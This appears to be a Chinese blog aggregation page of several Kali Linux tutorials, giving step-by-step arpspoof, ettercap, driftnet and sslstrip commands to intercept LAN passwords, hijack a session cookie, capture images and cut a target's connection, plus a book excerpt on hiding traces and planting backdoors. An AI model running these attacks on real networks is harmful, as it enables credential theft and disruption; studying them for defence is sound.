2019-11-10 16:17:59 qq_41860876 阅读数 482
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    667 人正在学习 去看看 林晓炜

在一个局域网内在没有进行加密盗取监控你和帐号密码是一个非常简单实现的,预防ARP欺骗
预防

  1. 预防ARP欺骗
    他默认是动态的通常的不在意网关ip的
    设置成静态的就可以简单预防ARP欺骗了

实验用的系统和工具

  1. 工具Nmap,Arpspoof,Driftnet和 Wireshark

  2. 命令
    命令1:在linux系统里ifconfig显示或配置网络设备
    命令2:在winodws里ifconfig显示或配置网络设备

  3. 攻击端kali linux系统
    在这里插入图片描述
    在这里插入图片描述
    Linux版的 kali linux是一个专门进行渗透安全做的
    是黑客必不可少的工具之一
    kali有几千个工具比如著名的列:
    扫描大王:Nmap
    Nmap在《黑客帝国》和《谍影重重:极限伯恩》等等电影里也出现过
    学习书《Nmap 参考指南 》
    sql注入利器:sqlmap
    学习书《sqlmap入门到精通》
    神兵利器:msf
    学习书《Metasploit渗透测试指南》
    抓包工具:wire shark
    学习书《Wireshark网络分析的艺术》《网络协议分析》
    瑞士军刀:burp suite
    学习书《BurpSuite 实战指南》

    。。。。。。。。。
    还有很多就不多说了

  4. 客户端winxp系统
    微软开发windowsxp,windows2000,windows7,windows10.windows2003大家都在用windows就不多介绍了
    在这里插入图片描述

  5. 配置查看
    kali查看ip和网关

    ifconfig
    

    在这里插入图片描述
    winxp查看ip和网关

    ipconfi
    

    在这里插入图片描述

开始演示局域网密码盗窃

  1. 用kali里的nmap工具进行局域网扫描

    nmap -sP 192.168.43.0/24
    

    可以看见他存活这ip是192.168.43.218
    在这里插入图片描述
    英文不好的我果断翻译一下
    MAC地址是小米的
    我用的是小米手机开的热点电脑连接的
    在这里插入图片描述

  2. 先进行进行IP流量转发不然被黑的xp系统网络就不能用了

    echo 1 > /proc/sys/net/ipv4/ip_forward 
    

    在这里插入图片描述

  3. arp欺骗
    kali现在没有默认安装arpspoof需要自己下载

    apt-get install dsniff ssldump
    

    下载
    在这里插入图片描述

  4. 转发数据包

    arpspoof -i wlan0 -t 192.168.43.218 192.168.43.255
    

    在这里插入图片描述

  5. 客户端登陆帐号密码
    在这里插入图片描述

  6. 攻击端的我就可以查看你所有客户端操作的过程
    帐号密码已经被抓取
    在这里插入图片描述

  7. 拿到PHPSESSID
    在这里插入图片描述

  8. 登陆
    登陆成功
    在这里插入图片描述

  9. 抓取客户端照片
    kali现在需要下载 Driftnet

    apt-get install driftnet
    

    下载完成
    在这里插入图片描述
    开始抓取网卡流过的照片

    driftnet -i   wlan0
    

    在这里插入图片描述

    客户端比如在访问照片
    在这里插入图片描述
    攻击端的我用Driftnet进行抓取照片

    driftnet -i   wlan0
    

    可以自己照片已经被抓取到了
    在这里插入图片描述

  10. 抓取qq聊天记录
    哈哈哈哈哈哈哈哈哈哈就不要想了被加密了
    在这里插入图片描述

作者QQ2737977997

2018-06-22 10:21:00 weixin_30576859 阅读数 35
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    667 人正在学习 去看看 林晓炜

使用nmap 工具在局域网里进行侦探,查看局域网里ip存活数量

root@kali:~# nmap -sP 192.168.1.0/24

 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 20:59 EST

Nmap scan report for 192.168.1.1 (192.168.1.1)

Host is up (0.0026s latency).

MAC Address: EC:82:63:85:01:E0 (Unknown)

Nmap scan report for tl-wdr6300 (192.168.1.2)

Host is up (0.0039s latency).

MAC Address: BC:46:99:71:F2:E2 (Tp-link Technologies)

Nmap scan report for 192.168.1.3 (192.168.1.3)

Host is up (0.00016s latency).

MAC Address: B0:35:9F:09:70:8B (Intel Corporate)

Nmap scan report for hao-pc (192.168.1.6)

Host is up (0.00056s latency).

MAC Address: 00:0C:29:B8:63:5A (VMware)

Nmap scan report for 192.168.1.200 (192.168.1.200)

Host is up (0.00030s latency).

MAC Address: 00:0C:29:1C:FD:85 (VMware)

Nmap scan report for kali (192.168.1.5)

Host is up.

Nmap done: 256 IP addresses (6 hosts up) scanned in 2.00 seconds

扫描端口:

Nmap 192.168.1.6

进行arp欺骗:

在进行arp欺骗之前需要开启ip转发,没有ip转发目标机器就会无法上网。

root@kali:~# cat /proc/sys/net/ipv

ipv4/ ipv6/

root@kali:~# cat /proc/sys/net/ipv4/ip_forward

1

root@kali:~#

 

进行arp欺骗

root@kali:~# arpspoof -i

eth0  lo    

root@kali:~# arpspoof -i eth0 192.168.1.6 192.168.1.1

Version: 2.4

Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

root@kali:~# arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a

 

获取靶机信息

root@kali:~# ettercap -Tq -i eth0

 

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

 

Listening on:

  eth0 -> 00:0C:29:C5:32:32

  192.168.1.5/255.255.255.0

  fe80::20c:29ff:fec5:3232/64

 

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 65534 EGID 65534...

 

  33 plugins

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

 

Randomizing 255 hosts for scanning...

Scanning the whole netmask for 255 hosts...

* |==================================================>| 100.00 %

 

6 hosts added to the hosts list...

Starting Unified sniffing...

 

 

Text only Interface activated...

Hit 'h' for inline help

 

随着靶机查看信息得到反馈

获取到的信息是所有的数据流量(就是有点多)

 

转载于:https://www.cnblogs.com/haozheyu/p/9212175.html

2017-12-24 15:50:15 wy_bk 阅读数 10763
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    667 人正在学习 去看看 林晓炜

特别声明:
我们学习研究网络安全技术的目的应是为了维护网络世界的安全,保护自己和他人的私有信息不被非法窃取和传播。请您遵守您所在地的法律,请勿利用本文所介绍的相关技术做背离道德或者违反法律的事情。

Special statement:
The purpose of our study of cyber security technology should be to maintain the security of the cyber world and protect the private information of ourselves and others from being illegally stolen and disseminated. Please comply with your local laws. Do not take advantage of the relevant technology introduced in this article to do anything that deviates from morality or against the law.

前言:

ARP攻击是基于ARP协议的工作模式进行的,关于ARP协议和ARP攻击的基础知识请查看我的这篇博文ARP协议与ARP攻击入门

ARP攻击能够实现的技术前提有两个,一是作为攻击者的计算机需要和被攻击者的计算机在一个局域网中,二是作为攻击者的计算机需要知道被攻击者计算机的局域网IP。本文将模拟真实的攻击过程,在不与被攻击的计算机发生物理接触的情况下实现对其的局域网断网攻击。

网络拓扑图

图 1
图 1

注:在这里,作为攻击者的计算机使用的是安装在VMware Workstation中的Kali Linux,我们需要在VMware的设置中将Kali的联网方式改为“桥接模式”,并且不要勾选“复制物理网络连接状态”。

获取目标主机IP

在这里,我们使用Ettercap对内网进行扫描以获取目标主机IP和网关的信息。输入命令:

ettercap -G

打开Ettercap的GUI界面:
图 2
图 2

依次点击“Sniff(嗅探) -> Unified sniffing(统一嗅探)”,之后弹出如下界面让选择进行扫描的网络接口(Network interface):
图 3
图 3

这里我们使用默认的eth0端口。点击“OK”。

之后依次点击“Hosts(主机) -> Scan for hosts(扫描主机)”。
这时会出现一个进度条,等待进度条结束,依次点击“Hosts -> Hosts list(主机列表)”即可显示本机所在局域网中除本机之外,当前已连接至网络的设备的IP地址和MAC地址:
图 4
图 4

注:Ettercap扫描结果的第一项一般是本局域网中的网关,如图中的192.168.50.1就是实验时局域网中的默认网关。

这样我们就获得了目标主机的IP和本局域网的网关。

对局域网内的目标主机实施断网攻击

我们使用Kali Linux中的Arpspoof进行ARP攻击。

在实施断网攻击前,我们先测试一下目标主机192.168.50.130是不是能上网,输入命令:

ping www.baidu.com

发现可以Ping通,说明目标主机在攻击开始之前是可以上网的。

在我们的攻击机上,即Kali中,输入命令:

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
e.g:
arpspoof -i eth0 -t 192.168.50.130 192.168.50.1

回车就开始对目标主机进行断网攻击了,此时我们在目标主机上执行命令:

ping www.baidu.com

就会返回一个错误提示:“Ping请求找不到主机www.baidu.com”。

通过上述命令产生的Arpspoof的攻击进程不会自动停止,除非当前攻击链路被中断,如攻击机关机或者断开与当前局域网的连接,或目标机关机或者断开与当前局域网的连接或者更改了其在当前局域网内的IP地址。我们可以在Arpspoof进程所在终端上使用“Ctrl+Z”手动关闭Arpspoof的攻击进程。

关闭Arpspoof的攻击进程后,之前被攻击的目标主机一般会在几秒钟的时间内自动恢复正常的网络连接。

附:
Ettercap0.8.2的帮助信息(命令ettercap -help):

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team


Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IP/IPv6/PORTs (see the man for further detail)

Sniffing and Attack options:
  -M, --mitm <METHOD:ARGS>    perform a mitm attack
  -o, --only-mitm             don't sniff, only perform the mitm attack
  -b, --broadcast             sniff packets destined to broadcast
  -B, --bridge <IFACE>        use bridged sniff (needs 2 ifaces)
  -p, --nopromisc             do not put the iface in promisc mode
  -S, --nosslmitm             do not forge SSL certificates
  -u, --unoffensive           do not forward packets
  -r, --read <file>           read data from pcapfile <file>
  -f, --pcapfilter <string>   set the pcap filter <string>
  -R, --reversed              use reversed TARGET matching
  -t, --proto <proto>         sniff only this proto (default is all)
      --certificate <file>    certificate file to use for SSL MiTM
      --private-key <file>    private key file to use for SSL MiTM

User Interface Type:
  -T, --text                  use text only GUI
       -q, --quiet                 do not display packet contents
       -s, --script <CMD>          issue these commands to the GUI
  -C, --curses                use curses GUI
  -D, --daemon                daemonize ettercap (no GUI)
  -G, --gtk                   use GTK+ GUI

Logging options:
  -w, --write <file>          write sniffed data to pcapfile <file>
  -L, --log <logfile>         log all the traffic to this <logfile>
  -l, --log-info <logfile>    log only passive infos to this <logfile>
  -m, --log-msg <logfile>     log all the messages to this <logfile>
  -c, --compress              use gzip compression on log files

Visualization options:
  -d, --dns                   resolves ip addresses into hostnames
  -V, --visual <format>       set the visualization format
  -e, --regex <regex>         visualize only packets matching this regex
  -E, --ext-headers           print extended header for every pck
  -Q, --superquiet            do not display user and password

LUA options:
      --lua-script <script1>,[<script2>,...]     comma-separted list of LUA scripts
      --lua-args n1=v1,[n2=v2,...]               comma-separated arguments to LUA script(s)

General options:
  -i, --iface <iface>         use this network interface
  -I, --liface                show all the network interfaces
  -Y, --secondary <ifaces>    list of secondary network interfaces
  -n, --netmask <netmask>     force this <netmask> on iface
  -A, --address <address>     force this local <address> on iface
  -P, --plugin <plugin>       launch this <plugin>
  -F, --filter <file>         load the filter <file> (content filter)
  -z, --silent                do not perform the initial ARP scan
  -6, --ip6scan               send ICMPv6 probes to discover IPv6 nodes on the link
  -j, --load-hosts <file>     load the hosts list from <file>
  -k, --save-hosts <file>     save the hosts list to <file>
  -W, --wifi-key <wkey>       use this key to decrypt wifi packets (wep or wpa)
  -a, --config <config>       use the alterative config file <config>

Standard options:
  -v, --version               prints the version and exit
  -h, --help                  this help screen

end
更多内容请访问我的个人网站荒原之梦

2014-06-23 13:58:26 u012339746 阅读数 756
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    667 人正在学习 去看看 林晓炜

1.3 渗透测试的一般化流程

凡事预则立,不预则废,做任何事情都要有一个预先的计划。渗透测试作为测试学科的一个分支,早已形成了完整的方法论。在正式开始本书的实践教学章节之前,我也想谈一谈使用Kali Linux的基本方法。这里讨论方法论的目的有两个:

第一,在第一节里,我们看到Kali Linux集成了这么多工具,而且更令人欣喜的是已经对这些工具进行了专业的分类。这些工具的使用场景和使用阶段是什么样的呢?把工具拿来胡乱一顿扫描是不会有什么结果的。

第二,本书的章节规划,也需要一个规范,这个规范是我从渗透测试方法论中学来的,并进行了简化,称之为“渗透测试的一般化流程”。

当然本节内容不会长篇大论,也不适用于企业内部的专业的渗透测试团队来遵循。只是希望给初学渗透测试的同学一个入门的指引,有章可循,有法可依。只是学习本书的基本练习流程,不是标准的测试流程。

下面这这张图是《backtrack4 利用渗透测试保证系统安全》一书的Backtrack方法论。

它将渗透测试分成了十个步骤,其中第6步“社会工程学”为可选步骤,但是笔者认为社会工程学在渗透测试的任何一个流程中都有用武之地,它是安全测试的一个方法,不应该成为一个单独的流程。

在本书中,我们将整个过程划分为5个步骤。

1.3.1 信息搜集

在练习过程中,选择目标的过程,读者自行完成。在讲解具体漏洞攻击的章节中,还会讲解一些如何快速查找特定目标的方法。本书假定读者已经准备好了测试目标才阅读和实践书中内容,所以流程的第一步为信息搜集。

在这一步中,我们尽可能的使用多种信息搜集工具,包括搜索引擎和社会工程学方法。对能收集到的信息,来者不拒。

只有建立在足够信息分析的基础上,渗透测试才能游刃有余。因为信息越多,发现漏洞的几率越大。

同时对不同应用的信息收集的侧重点也不同。比如web应用和桌面应用,对于web应用,服务器操作系统、web服务器类型、web后台语言会被首先关注;而对于桌面应用,更多的是关心应用程序本身。

1.3.2 发现漏洞

在搜集了足够的信息之后,首先我们要判断它会存在哪些漏洞。这可以通过搜索引擎,和通用的漏洞扫描工具来完成。通常使用搜索引擎是明智的选择,比如我们在第一步中知道对方站点的编写语言为php 5.3.*,可以在google搜索“php 5.3”漏洞。

很多专业的bug站点的信息,更值得我们驻足。这样我们就可以针对性的进行漏洞扫描。此时使用专门的漏洞扫描工具比通用工具来得更实际和高效。

1.3.3 攻击

基本上,你能得到的漏洞,都可以找到对应的攻击方法。Kali Linux中也提供了很多现成的工具,来帮助我们顺利的攻击目标。

这一步包含两个方面,一个是利用现有漏洞利用,一个是提权。二者有时候是一回事,比如权限漏洞。

渗透测试和以破坏为目的的黑客行为还是有区别的,测试的目的是证明漏洞的存在,而不是搞破坏。所以有时候攻击成功之后可能测试任务就结束了,当然这和测试目标是紧密相关的。

攻击还包含一个重要的内容,就是如何隐藏攻击行为或者清除攻击痕迹。让对方无法或者说很难通过反追踪技术查找到攻击者。

1.3.4 权限维持

权限维持阶段,是我们成功攻破一个系统后,如何继续保持对系统的控制权限的问题。

一般会创建高权限的隐藏账户,或者安装后门程序(包括木马,病毒)。

1.3.5 文档化

文档化不是本书的强制流程,但是笔者强烈建议我们对每次渗透测试的过程和结果进行文档化处理。这样会形成知识的积累。当然如果你是专业的渗透测试工程师或者手上有渗透测试的项目,那么标准化文档是必不可少的。

小结

本节所讲解的流程不是标准的渗透测试流程,是本书的教学实践简化流程,读者要区别对待。

下一节,是本章的最后一节,以一个小例子来体验Kali Linux的渗透测试,来提升大家的兴趣。

1.4节--《小试牛刀》。


转自:http://blog.chinaunix.net/uid-26349264-id-4046360.html

2018-07-11 14:39:59 weixin_34214500 阅读数 5
  • Kali Linux渗透测试基础入门到进阶实战全程课

    1、课程概要       本专栏主要分享Kali Linux渗透测试基础入门到进阶实战全程课! 2、课程目标      本课程致力于帮助大家掌握Kali Linux渗透测试基础与实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看和学习! 4、特别提醒         本课程支持一次购买,永久观看,请广大学员放心选购!

    667 人正在学习 去看看 林晓炜

局域网账号密码截取:
echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward 显示1则显示上一条命令执行成功
使用:
arpspoof -i eth0 -t IP地址 网关
ettercap -Tq -i eth0 -Tq 启动文本模式,q安静模式,-i一般后面跟网卡
获取到的url如果是中文,url会有一字符串,百度url解码,转为中文

htpps账号密码获取
开启SSH:/etc/init.d/ssh start

logout 注销kali当前登录账号

vim 路径/文件名.后缀 文本编辑器 文本不存在,会新建一个,i键,光标前插入,底行模式wq保存并退出

sslstrip https连接还原为http
开启 sslstrip -a -f -k
先欺骗,后抓包

!命令名 kali会自动选择上一次命令

Xshell 远程登录kali,失误关闭可用oppen 回话名称 打开

转载于:https://blog.51cto.com/3945465/2140389

Kali实现局域网ARP欺骗和ARP攻击...

博文 来自: tiaotiaolong99234
没有更多推荐了,返回首页